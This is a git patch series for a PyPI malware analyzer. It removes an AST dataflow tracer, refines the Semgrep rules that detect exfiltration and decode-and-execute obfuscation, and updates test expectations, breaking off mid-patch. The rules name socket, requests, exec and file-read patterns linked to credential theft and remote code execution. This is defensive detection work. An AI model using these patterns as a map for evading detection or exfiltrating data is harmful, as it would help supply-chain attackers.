tempfile from collections import defaultdict @@ -206,257 +201,3 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes analysis_result[category].append({"file": file, "start": start, "end": end}) return result, dict(analysis_result) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. - - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. - """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. - # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. - # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["calls"] - suspicious_const: dict = self.suspicious_patterns["constants"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. - self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. - """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. - - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s From 0eb2d54811051decf5e49b48e27c29f4caace974 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:35:00 +1000 Subject: [PATCH 19/37] feat: updated semgrep rules to reduce false positives based on ICSE25 dataset results Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/exfiltration.yaml | 93 ++- .../pypi_malware_rules/obfuscation.yaml | 145 ++--- .../exfiltration/expected_results.json | 34 +- ...exfiltration.py => remote_exfiltration.py} | 0 .../obfuscation/default_assigning.py | 61 -- .../obfuscation/expected_results.json | 600 +++++------------- .../{tools.py => obfuscation_tools.py} | 0 7 files changed, 303 insertions(+), 630 deletions(-) rename tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/{remote-exfiltration.py => remote_exfiltration.py} (100%) delete mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py rename tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/{tools.py => obfuscation_tools.py} (100%) diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index 146d04315..4eee8d033 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -2,7 +2,7 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: -- id: remote-exfiltration +- id: exfiltration_remote-exfiltration metadata: description: Identifies the flow of sensitive information to a remote endpoint. message: Detected exfiltration of sensitive data to a remote endpoint. @@ -19,7 +19,6 @@ rules: # result of code/command evaluation - pattern: exec(...) - pattern: eval(...) - - pattern: ast.literal_eval(...) - pattern: builtins.exec(...) - pattern: builtins.eval(...) - pattern: __import__('builtins').exec(...) @@ -120,8 +119,29 @@ rules: # file exfiltration - pattern: os.read(...) - - pattern: $FILE.read(...) - - pattern: $FILE.readlines(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) - pattern: yaml.safe_load(...) - pattern: json.loads(...) @@ -129,23 +149,54 @@ rules: - pattern-either: # remote connection # using socket module - - pattern: $SOC.accept(...) - - pattern: $SOC.bind(...) - - pattern: $SOC.connect(...) - - pattern: $SOC.connect_ex(...) - - pattern: $SOC.listen(...) - - pattern: $SOC.recv(...) - - pattern: $SOC.recvfrom(...) - - pattern: $SOC.recvmsg(...) - - pattern: $SOC.recvmsg_into(...) - - pattern: $SOC.recvfrom_into(...) - - pattern: $SOC.recv_into(...) - - pattern: $SOC.send(...) - - pattern: $SOC.sendall(...) - - pattern: $SOC.sendto(...) - - pattern: $SOC.sendmsg(...) - - pattern: $SOC.sendmsg_afalg(...) - - pattern: $SOC.sendfile(...) + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) # using requests module - pattern: requests.get(...) - pattern: requests.post(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index c74122458..ab956dfda 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -2,57 +2,7 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: -- id: default-assigning - metadata: - description: Identifies when a default python function is assigned to another variable - message: Found an instance of assigning a builtin python function to a variable - languages: - - python - severity: ERROR - pattern-either: - # assigning, many obfuscation tools listed below do this - - pattern: $VAR = __import__ - - pattern: $VAR = getattr - - pattern: $VAR = bytes - - pattern: $VAR = bytearray - - pattern: $VAR = exec - - pattern: $VAR = eval - - pattern: $VAR = setattr - - pattern: $VAR = compile - - pattern: $VAR = map - - pattern: $VAR = open - - pattern: $VAR = zip - - pattern: $VAR = vars - - pattern: $VAR = dir - # doing the same using the builtins module - - pattern: $VAR = builtins.__import__ - - pattern: $VAR = builtins.getattr - - pattern: $VAR = builtins.bytes - - pattern: $VAR = builtins.bytearray - - pattern: $VAR = builtins.exec - - pattern: $VAR = builtins.eval - - pattern: $VAR = builtins.setattr - - pattern: $VAR = builtins.compile - - pattern: $VAR = builtins.map - - pattern: $VAR = builtins.open - - pattern: $VAR = builtins.zip - - pattern: $VAR = builtins.vars - - pattern: $VAR = builtins.dir - - pattern: $VAR = __import__('builtins').__import__ - - pattern: $VAR = __import__('builtins').getattr - - pattern: $VAR = __import__('builtins').bytes - - pattern: $VAR = __import__('builtins').bytearray - - pattern: $VAR = __import__('builtins').exec - - pattern: $VAR = __import__('builtins').eval - - pattern: $VAR = __import__('builtins').setattr - - pattern: $VAR = __import__('builtins').compile - - pattern: $VAR = __import__('builtins').builtins.map - - pattern: $VAR = __import__('builtins').open - - pattern: $VAR = __import__('builtins').zip - - pattern: $VAR = __import__('builtins').vars - - pattern: $VAR = __import__('builtins').dir - -- id: obfuscation-tools +- id: obfuscation_obfuscation-tools metadata: description: detects the use of python obfuscation packages on the source code message: Found an instance of import and/or using python obfuscation tools @@ -88,16 +38,7 @@ rules: - pattern: import mystificate - pattern: import demiurgic -- id: inline-imports - metadata: - description: detects the use of the private inline import __import__(...) - message: detected use of inline imports - languages: - - python - severity: ERROR - pattern: __import__($MODULE) - -- id: decode-and-execute +- id: obfuscation_decode-and-execute metadata: description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write @@ -116,11 +57,9 @@ rules: # bytes decoding - pattern: | b'...'.decode(...) - - pattern: $BYTES.decode(...) - pattern: bytes.decode(...) - pattern: builtins.bytes.decode(...) - pattern: __import__('builtins').bytes.decode(...) - - pattern: $BYTES.join(...).decode() # decompression - pattern: zlib.decompress(...) - pattern: __import__('zlib').decompress(...) @@ -147,24 +86,44 @@ rules: - pattern-either: # remote connection # using socket module - - pattern: socket.socket(...) - - pattern: $SOC.accept(...) - - pattern: $SOC.bind(...) - - pattern: $SOC.connect(...) - - pattern: $SOC.connect_ex(...) - - pattern: $SOC.listen(...) - - pattern: $SOC.recv(...) - - pattern: $SOC.recvfrom(...) - - pattern: $SOC.recvmsg(...) - - pattern: $SOC.recvmsg_into(...) - - pattern: $SOC.recvfrom_into(...) - - pattern: $SOC.recv_into(...) - - pattern: $SOC.send(...) - - pattern: $SOC.sendall(...) - - pattern: $SOC.sendto(...) - - pattern: $SOC.sendmsg(...) - - pattern: $SOC.sendmsg_afalg(...) - - pattern: $SOC.sendfile(...) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) # using requests module - pattern: requests.get(...) - pattern: requests.post(...) @@ -284,15 +243,33 @@ rules: # code evaluation/execution - pattern: exec(...) - pattern: eval(...) - - pattern: ast.literal_eval(...) - pattern: builtins.exec(...) - pattern: builtins.eval(...) - pattern: __import__('builtins').exec(...) - pattern: __import__('builtins').eval(...) # file write - - pattern: $FILE.write(...) - - pattern: $MODULE.dumps(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) - pattern: os.write(...) - pattern: os.writev(...) - pattern: os.pwrite(...) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 33b4d6716..8890a70b6 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,19 +1,19 @@ { - "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ - { - "file": "exfiltration/remote-exfiltration.py", - "start": 31, - "end": 31 - }, - { - "file": "exfiltration/remote-exfiltration.py", - "start": 42, - "end": 42 - }, - { - "file": "exfiltration/remote-exfiltration.py", - "start": 50, - "end": 50 - } + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ + { + "file": "exfiltration/remote-exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote-exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote-exfiltration.py", + "start": 50, + "end": 50 + } ] -} + } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py similarity index 100% rename from tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py rename to tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py deleted file mode 100644 index ed2c9dda9..000000000 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py +++ /dev/null @@ -1,61 +0,0 @@ -# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Running this code will not produce any malicious behavior, but code isolation measures are -in place for safety. -""" - -import sys - -# ensure no symbols are exported so this code cannot accidentally be used -__all__ = [] -sys.exit() - -def test_function(): - """ - All code to be tested will be defined inside this function, so it is all local to it. This is - to isolate the code to be tested, as it exists to replicate the patterns present in malware - samples. - """ - sys.exit() - import builtins - _ = __import__ - _ = getattr - _ = bytes - _ = bytearray - _ = exec - _ = eval - _ = setattr - _ = compile - _ = map - _ = open - _ = zip - _ = vars - _ = dir - _ = builtins.__import__ - _ = builtins.getattr - _ = builtins.bytes - _ = builtins.bytearray - _ = builtins.exec - _ = builtins.eval - _ = builtins.setattr - _ = builtins.compile - _ = builtins.map - _ = builtins.open - _ = builtins.zip - _ = builtins.vars - _ = builtins.dir - _ = __import__('builtins').__import__ - _ = __import__('builtins').getattr - _ = __import__('builtins').bytes - _ = __import__('builtins').bytearray - _ = __import__('builtins').exec - _ = __import__('builtins').eval - _ = __import__('builtins').setattr - _ = __import__('builtins').compile - _ = __import__('builtins').builtins.map - _ = __import__('builtins').open - _ = __import__('builtins').zip - _ = __import__('builtins').vars - _ = __import__('builtins').dir diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 1da7cb255..b4f1dce24 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,450 +1,156 @@ { - "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } ], - "src.macaron.resources.pypi_malware_rules.inline-imports": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 44, - "end": 44 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 69, - "end": 69 - } - ], - "src.macaron.resources.pypi_malware_rules.default-assigning": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 62, - "end": 62 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 24, - "end": 24 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 25, - "end": 25 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 29, - "end": 29 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 31, - "end": 31 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 32, - "end": 32 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 34, - "end": 34 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 35, - "end": 35 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 36, - "end": 36 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 39, - "end": 39 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 43, - "end": 43 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 44, - "end": 44 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 45, - "end": 45 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 46, - "end": 46 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 48, - "end": 48 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ - { - "file": "obfuscation/tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/tools.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ + { + "file": "obfuscation/tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/tools.py", + "start": 68, + "end": 68 + } ] -} + } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py similarity index 100% rename from tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py rename to tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py From 9c3efb042cb4ac7909d7ea511e918e68ea6d0850 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:50:33 +1000 Subject: [PATCH 20/37] test: fixed broken tests for semgrep rules Signed-off-by: Carl Flottmann --- .../exfiltration/expected_results.json | 6 +- .../obfuscation/expected_results.json | 310 +++++++++--------- 2 files changed, 158 insertions(+), 158 deletions(-) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json 